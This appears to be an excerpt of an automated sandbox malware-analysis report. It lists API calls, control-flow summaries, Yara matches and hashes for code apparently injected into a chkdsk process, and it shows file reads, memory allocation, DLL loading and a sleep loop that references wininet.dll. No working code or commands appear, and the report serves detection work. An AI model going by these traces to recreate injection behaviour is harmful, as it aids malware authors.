34272->34276 34273 97f52e 34273->34247 34275->34268 34276->34273 34278 98bf90 2 API calls 34277->34278 34279 989897 34278->34279 34298 979310 34279->34298 34281 9898b2 34282 9898d9 34281->34282 34283 9898f0 34281->34283 34284 98bdc0 2 API calls 34282->34284 34286 98bd40 2 API calls 34283->34286 34285 9898e6 34284->34285 34285->34251 34287 98992a 34286->34287 34288 98bd40 2 API calls 34287->34288 34289 989943 
34288->34289 34295 989be4 34289->34295 34304 98bd80 LdrLoadDll 34289->34304 34291 989bc9 34292 989bd0 34291->34292 34291->34295 34293 98bdc0 2 API calls 34292->34293 34294 989bda 34293->34294 34294->34251 34296 98bdc0 2 API calls 34295->34296 34297 989c39 34296->34297 34297->34251 34299 979335 34298->34299 34300 97acf0 LdrLoadDll 34299->34300 34301 979368 34300->34301 34302 97938d 34301->34302 34305 97cf20 34301->34305 34302->34281 34304->34291 34306 97cf4c 34305->34306 34307 98a1e0 LdrLoadDll 34306->34307 34308 97cf65 34307->34308 34309 97cf6c 34308->34309 34316 98a220 34308->34316 34309->34302 34313 97cfa7 34314 98a490 2 API calls 34313->34314 34315 97cfca 34314->34315 34315->34302 34317 98a23c 34316->34317 34318 98af60 LdrLoadDll 34316->34318 34325 53f9710 LdrInitializeThunk 34317->34325 34318->34317 34319 97cf8f 34319->34309 34321 98a810 34319->34321 34322 98a811 34321->34322 34323 98af60 LdrLoadDll 34322->34323 34324 98a82f 34323->34324 34324->34313 34325->34319 34327 98af60 LdrLoadDll 34326->34327 34328 989eac 34327->34328 34331 53f9840 LdrInitializeThunk 34328->34331 34329 989ebb 34329->34255 34331->34329 34332 989080 34333 98bd40 2 API calls 34332->34333 34335 9890bb 34333->34335 34334 98919c 34335->34334 34336 97acf0 LdrLoadDll 34335->34336 34337 9890f1 34336->34337 34338 984e50 LdrLoadDll 34337->34338 34339 98910d 34338->34339 34339->34334 34340 989120 Sleep 34339->34340 34343 988ca0 LdrLoadDll 34339->34343 34344 988eb0 LdrLoadDll 34339->34344 34340->34339 34343->34339 34344->34339 34347 53f9540 LdrInitializeThunk

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 284 98a35a-98a35d 285 98a360-98a3a5 call 98af60 284->285 286 98a3a7-98a3b1 NtCreateFile 284->286 285->286
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00984BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00984BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0098A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: f35c1b23308f1b4c3e511d67d2b3f4f2f5b737bda8ebd33774cbe949afeb9734
                    • Instruction ID: 68c1c071407035a7d42796f3ab7362951b07f3de70595d02681a9655a8cd89ac
                    • Opcode Fuzzy Hash: f35c1b23308f1b4c3e511d67d2b3f4f2f5b737bda8ebd33774cbe949afeb9734
                    • Instruction Fuzzy Hash: 1301A4B2201108AFDB08DF88DC85EEB77ADAF8C754F158249FA09A7245C630F8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 98a360-98a3b1 call 98af60 NtCreateFile
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00984BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00984BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0098A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: cb19b6472d6b6d502c511bfedd602269fa4cf555954a9dd467324f97cc3d94b7
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: F4F0BDB2200208AFCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 560 98a45a-98a45d 561 98a45f-98a489 call 98af60 560->561 562 98a410-98a459 call 98af60 NtReadFile 560->562
                    APIs
                    • NtReadFile.NTDLL(00984D72,5EB65239,FFFFFFFF,00984A31,?,?,00984D72,?,00984A31,FFFFFFFF,5EB65239,00984D72,?,00000000), ref: 0098A455
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 14860f70b1df318ed92c0b5e24e4106881b7a96749048ab34e0f980484a2c449
                    • Instruction ID: a2ca7e05675430676ec7e81588fc1b27c683a1619c06c3aaf9c8f0d144b2122a
                    • Opcode Fuzzy Hash: 14860f70b1df318ed92c0b5e24e4106881b7a96749048ab34e0f980484a2c449
                    • Instruction Fuzzy Hash: EC1127B2200208AFDB14EF98CC85EEB77A8EF8C754F118659BA0D97241C630E910CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00972D11,00002000,00003000,00000004), ref: 0098A579
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 5311634b580f465503b5656b162f92f56a3ef50a22002ac76c572f22b043f40a
                    • Instruction ID: b5615c65d24e45456af3c9567104d41c0d35483afc403a8a9a32c2575b637e48
                    • Opcode Fuzzy Hash: 5311634b580f465503b5656b162f92f56a3ef50a22002ac76c572f22b043f40a
                    • Instruction Fuzzy Hash: 901169B2200208AFDB18DF88DC85EEB77ADEF88750F148559FA1D97241C630E810CBB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(00984D72,5EB65239,FFFFFFFF,00984A31,?,?,00984D72,?,00984A31,FFFFFFFF,5EB65239,00984D72,?,00000000), ref: 0098A455
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 9290a7743306a33b2263e8930dd9a247a3cabf2ce96174e80b066b46f7953c8f
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 78F0B7B2200208AFDB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00972D11,00002000,00003000,00000004), ref: 0098A579
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: 3ff5185c83d67d215228a2e2e7f1a876d58de941ed8526fc49096ced6a3b28bb
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 2FF015B2200208AFDB14DF89CC81EAB77ADEF88754F118149BE0897241C630F810CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00984D50,?,?,00984D50,00000000,FFFFFFFF), ref: 0098A4B5
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: 2641b26a8663655ed39c4235207daaf98506baaa314c3033ef307e10d14ddba5
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: DDD012752002146BD710EB98CC45F97775CEF44750F154455BA185B242C530F50087E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00984D50,?,?,00984D50,00000000,FFFFFFFF), ref: 0098A4B5
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
                    • Instruction ID: 47406cf8f20e351a6034b495665d1bbbc4bf137c138fd19ca6f9f1e2505a7d2a
                    • Opcode Fuzzy Hash: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
                    • Instruction Fuzzy Hash: 6ED05E76200214BFE710EFA8CC85FE77B68EF88760F158599BA1CDB242C530E60087E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6cfa375fa7c36f7d7d89ade794aee184852eaf241723b3dc2e4d5aa8f9ec0115
                    • Instruction ID: 291a37811ac9d51a004770234199413161e8175963ec1c0e91717379304f3fc0
                    • Opcode Fuzzy Hash: 6cfa375fa7c36f7d7d89ade794aee184852eaf241723b3dc2e4d5aa8f9ec0115
                    • Instruction Fuzzy Hash: 33900265615000030105A5990744547006697D53A13A1D032F1005554CD7B188656161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1d400e0f912a880ed28845718fe30be6562fb2c042ad462059e6f049f1a0b1df
                    • Instruction ID: c6d18594c4c76d8d64e4ad7d4db4293df05b84d093993869cc9cf3b802660ed5
                    • Opcode Fuzzy Hash: 1d400e0f912a880ed28845718fe30be6562fb2c042ad462059e6f049f1a0b1df
                    • Instruction Fuzzy Hash: 189002A160600003410571994454656402A97E0251BA1D032E1004594DC6B588957165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 578cfde0bf2bfeac9564070e46ccbbe2cb8574b1b3ac2fab74f518e743fb10b8
                    • Instruction ID: 18f1836c98b3b07d90abd1c3bdae82a8c96a3dddc06dd578db436ff88b9b6b21
                    • Opcode Fuzzy Hash: 578cfde0bf2bfeac9564070e46ccbbe2cb8574b1b3ac2fab74f518e743fb10b8
                    • Instruction Fuzzy Hash: A990027160500402D10065D95448686002597E0351FA1E022A5014559EC7F588957171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b58cee979e6078c82dd6c2f142c0dfbba8a6e98b975cb071793d7cc26768ca07
                    • Instruction ID: 08569654eea577dcb9baed606074f1751786664432e30709b9fc766a56dbbe79
                    • Opcode Fuzzy Hash: b58cee979e6078c82dd6c2f142c0dfbba8a6e98b975cb071793d7cc26768ca07
                    • Instruction Fuzzy Hash: CA90026961700002D1807199544864A002597D1252FE1E426A000555CCCAA5886D6361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 22c8db8535574c0f2045364536f30e76542e704df5b9e9305e28f3c342c7aa93
                    • Instruction ID: b6ed7090a82405e44da6bdfd2803f3e48a20d42b280d4dbed300fa26abb34231
                    • Opcode Fuzzy Hash: 22c8db8535574c0f2045364536f30e76542e704df5b9e9305e28f3c342c7aa93
                    • Instruction Fuzzy Hash: B790027171514402D11061998444746002597D1251FA1D422A081455CD87E588957162
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 166977cae6d98c9c41763ef6adb90adfa49e849edb76d8f310462cb10fdac789
                    • Instruction ID: 3dc15385a590e3f13264965540f6474fbe7a0623d5e3afd29c454af8f26433be
                    • Opcode Fuzzy Hash: 166977cae6d98c9c41763ef6adb90adfa49e849edb76d8f310462cb10fdac789
                    • Instruction Fuzzy Hash: 7A90027160500802D1807199444468A002597D1351FE1D026A0015658DCBA58A5D77E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 8ec1b6e54f090186806d17006df387be94faea432f756ccf9faf972bd4f360fd
                    • Instruction ID: 10eb5fd8e91db05f32704ff5950a567a72a85aba0266eaf9b114b9410e31c08b
                    • Opcode Fuzzy Hash: 8ec1b6e54f090186806d17006df387be94faea432f756ccf9faf972bd4f360fd
                    • Instruction Fuzzy Hash: 0490027160904842D14071994444A86003597D0355FA1D022A0054698D97B58D59B6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 33a6e7c2fdac6ed2762b10823e73599af2c94caf6b696e6d4121b277bca219cc
                    • Instruction ID: 50562da8bf9fc8155dd6a15506a7b0f8c2d130d1f17546f46b791b71590f8771
                    • Opcode Fuzzy Hash: 33a6e7c2fdac6ed2762b10823e73599af2c94caf6b696e6d4121b277bca219cc
                    • Instruction Fuzzy Hash: 5E90027160508802D1106199844478A002597D0351FA5D422A441465CD87E588957161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b2bb1735f544848fee05bdc1c02dc4ac2c1e237b1a8f09a49a077d768674f8bc
                    • Instruction ID: 9e7a0500bc140d2d37bb4a590f8ce00d9dd96510566336b6b5111e79df20eba0
                    • Opcode Fuzzy Hash: b2bb1735f544848fee05bdc1c02dc4ac2c1e237b1a8f09a49a077d768674f8bc
                    • Instruction Fuzzy Hash: 8790027160500842D10061994444B86002597E0351FA1D027A0114658D87A5C8557561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 12f551d21119f61e2bb491141eacf4ab881265fd43aa21176c7442c78a45cbcc
                    • Instruction ID: 5293cc23950941460ad30f54c69f14cd78de7876b36b9447a04fcf3d6a6b297e
                    • Opcode Fuzzy Hash: 12f551d21119f61e2bb491141eacf4ab881265fd43aa21176c7442c78a45cbcc
                    • Instruction Fuzzy Hash: 2E9002B160500402D14071994444786002597D0351FA1D022A5054558E87E98DD976A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 92e9b50122fd6146b3b2e10f21ddc62351a501f88aebde6eb38057b07356ce2d
                    • Instruction ID: 5d2159928a4b0416a78513b06eead062bf119933b37a1d5192789c8902bfbf92
                    • Opcode Fuzzy Hash: 92e9b50122fd6146b3b2e10f21ddc62351a501f88aebde6eb38057b07356ce2d
                    • Instruction Fuzzy Hash: 439002A174500442D10061994454B460025D7E1351FA1D026E1054558D87A9CC567166
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c94e176b59a70660a0636ec44466e8246dc7ec5fde6c39455f56edd8c7abe5a0
                    • Instruction ID: 5b28e9056caeb1623faf8bd41d3967acf41f8cd678a7b4d7297bec4d65b1ad77
                    • Opcode Fuzzy Hash: c94e176b59a70660a0636ec44466e8246dc7ec5fde6c39455f56edd8c7abe5a0
                    • Instruction Fuzzy Hash: 9E90027160500413D11161994544747002997D0291FE1D423A041455CD97E68956B161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2dd6a074d688dead63ff2d0505f73a78b44ff5ae2a2ea4dc41aab10487d32fb6
                    • Instruction ID: 3864edc09c19d1260a7d3928aac017ee3b640f5d1d54eb9387e26d972524ee3b
                    • Opcode Fuzzy Hash: 2dd6a074d688dead63ff2d0505f73a78b44ff5ae2a2ea4dc41aab10487d32fb6
                    • Instruction Fuzzy Hash: F3900261646041525545B19944445474026A7E02917E1D023A1404954C86B6985AE661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0bc6ee8fde4a033c0db61850d230ac789485bc45d9b43e0012233db2ad0db70c
                    • Instruction ID: fa6765da9fdaa86d02461a29d57f70c6155a547bd926d2f427a8eddc669ab173
                    • Opcode Fuzzy Hash: 0bc6ee8fde4a033c0db61850d230ac789485bc45d9b43e0012233db2ad0db70c
                    • Instruction Fuzzy Hash: DF90026161580042D20065A94C54B47002597D0353FA1D126A0144558CCAA588656561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 244 989077-9890af 245 9890bb-9890c2 244->245 246 9890b6 call 98bd40 244->246 247 9890c8-989118 call 98be10 call 97acf0 call 984e50 245->247 248 98919c-9891a2 245->248 246->245 255 989120-989131 Sleep 247->255 256 989133-989139 255->256 257 989196-98919a 255->257 258 98913b-989161 call 988ca0 256->258 259 989163-989184 call 988eb0 256->259 257->248 257->255 262 989189-98918c 258->262 259->262 262->257
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00989128
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: U$net.dll$wininet.dll
                    • API String ID: 3472027048-3063254571
                    • Opcode ID: ceff191e0f39d9d7548de005ae714a66bbe4a2170b7cb62d544ff29d1ecda0bf
                    • Instruction ID: 5a7b306772ca05a1b9265dff2976a9211752280567709e2b0f6653eb48436481
                    • Opcode Fuzzy Hash: ceff191e0f39d9d7548de005ae714a66bbe4a2170b7cb62d544ff29d1ecda0bf
                    • Instruction Fuzzy Hash: FA3191B2A04641BBC714EF64CC89B6BB7B8AB88B04F14801DF62D5B386D774A550CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 264 989080-9890c2 call 98bd40 267 9890c8-989118 call 98be10 call 97acf0 call 984e50 264->267 268 98919c-9891a2 264->268 275 989120-989131 Sleep 267->275 276 989133-989139 275->276 277 989196-98919a 275->277 278 98913b-989161 call 988ca0 276->278 279 989163-989184 call 988eb0 276->279 277->268 277->275 282 989189-98918c 278->282 279->282 282->277
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00989128
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                    • Instruction ID: 522d1f0e656d98a865b9db498f06d985ab1129dc555d8e90e51f2d8144dad114
                    • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                    • Instruction Fuzzy Hash: B2316FB2504645BBC724EF64C889F67B7B8BB88B00F14851DF62A6B245DB34A650CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 293 98a662-98a665 294 98a622-98a62d 293->294 295 98a667-98a686 293->295 296 98a68c-98a6a1 RtlFreeHeap 295->296 297 98a687 call 98af60 295->297 297->296
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973AF8), ref: 0098A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: d31173c4ca67f2789b202eec48985821e41c06c1604bf97a5c90593ffe46ea94
                    • Instruction ID: 1c5f1b102ce54cdb07a8bcc56c916c9559298e05f99271d887c1decf8862c164
                    • Opcode Fuzzy Hash: d31173c4ca67f2789b202eec48985821e41c06c1604bf97a5c90593ffe46ea94
